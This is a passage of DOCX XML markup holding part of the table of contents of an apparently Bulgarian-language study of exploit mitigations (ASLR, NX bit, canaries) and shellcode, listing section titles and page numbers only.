              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Address space layout randomisation (ASLR)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540755 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540756" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.3.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Бит за забрана на изпълнение (NX bit)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540756 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540757" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.3.6.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>“Канарчета”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540757 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540758" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>1.3.7.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Обобщение</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540758 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540759" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Втора глава Shellcode и неговото приложение за атаки</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540760" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Изисквания към шелкод</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540761" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разлики между операционните системи</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540762" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540762 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540763" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540763 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540764" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MacOS и BSD варианти</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540764 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540765" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разлики между архитектурите</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540765 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540766" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Методи за избягване на нулеви байтове</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540766 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540767" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.4.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xor %reg, %reg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
